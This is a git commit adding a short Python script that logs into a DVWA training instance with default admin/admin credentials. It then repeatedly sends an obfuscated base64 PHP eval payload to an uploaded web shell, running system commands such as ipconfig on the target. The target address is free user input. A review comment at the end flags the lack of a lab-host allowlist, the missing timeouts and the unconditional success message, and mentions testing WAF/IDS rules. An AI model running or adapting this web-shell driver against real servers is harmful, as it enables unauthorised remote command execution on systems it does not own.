| author | [email protected] <[email protected]> | 2019-09-11 18:09:37 +0800 |
|---|---|---|
| committer | [email protected] <[email protected]> | 2019-09-11 18:09:37 +0800 |
| commit | f905594f99d482c7bf9f5cb3a2c9dbad794d1475 (patch) | |
| tree | 60864112aa5466112c7b02f9ba4358a04040beca /high_menace_zhilan_exp.py | |
| parent | a33319f7484793c7fff4c265172512ece1cf9081 (diff) | |
Diffstat (limited to 'high_menace_zhilan_exp.py')
| -rw-r--r-- | high_menace_zhilan_exp.py | 33 |
1 files changed, 33 insertions, 0 deletions
diff --git a/high_menace_zhilan_exp.py b/high_menace_zhilan_exp.py
new file mode 100644
index 0000000..856b513
--- /dev/null
+++ b/high_menace_zhilan_exp.py
@@ -0,0 +1,33 @@
+# -*- coding: utf-8 -*-
+
+import requests
+
+
+attack_ip=raw_input("输入靶机的IP,如果有端口需要带上端口,例:192.168.0.40:88i/172.86.121.120 \n")
+attack_times=int(raw_input("输入攻击的次数 \n"))
+s = requests.session()
+login_url = 'http://' + attack_ip + '/dvwa/login.php' #自己的靶机需要修改路径
+attack_url='http://' + attack_ip + '/hackable/uploads/1.php'
+fangwen_login = {
+ 'username': 'admin',
+ 'password': 'admin',
+ 'Login': 'Login'
+}
+
+# fangwen_xm1= "1=@eval(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QvZCJDOlxkdndhLXYxLjJcaGFja2FibGVcdXBsb2Fkc1wiJmlwY29uZmlnJmVjaG8gW1NdJmNkJmVjaG8gW0Vd"
+fangwen_xm2= "1=@eval(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%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&z1=QzpcZHZ3YS12MS4yXGR2d2FcaW1hZ2VzXA%3D%3D"
+headers = {
+'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
+'Content-Type':'application/x-www-form-urlencoded'
+ }
+dvwa_login = s.post(login_url,data=fangwen_login,headers=headers)
+while attack_times>1:
+
+ dvwa_attack=s.post(attack_url,data=fangwen_xm2,headers=headers)
+ attack_times=attack_times -1
+else:
+
+ dvwa_attack=s.post(attack_url,data=fangwen_xm2,headers=headers)
+print ('攻击成功!')
+
+
|
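Review bot: `attack_ip` from `raw_input` is concatenated straight into `login_url` and `attack_url` with no check that it names a lab host, and one of the example addresses in the prompt is outside the RFC 1918 private ranges, so a typo sends the hard-coded `admin`/`admin` login and the `@eval(base64_decode($_POST[action]))` request body to an arbitrary machine over plain HTTP. I would validate the host part against an explicit allowlist before building the URLs, e.g. `if attack_ip.split(':')[0] not in LAB_HOSTS: raise SystemExit('target not in lab allowlist')`, where `LAB_HOSTS` is a constant to be defined at the top of the file (the name is mine, not the project's). The final `print` also reports success unconditionally and none of the `s.post` calls pass `timeout=`, so a run against an unreachable or already-cleaned test instance either hangs or looks identical to a delivered one. Anyone using this script to confirm that a WAF/IDS rule fires on that fixed request body therefore cannot tell from the output whether the traffic was actually sent.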
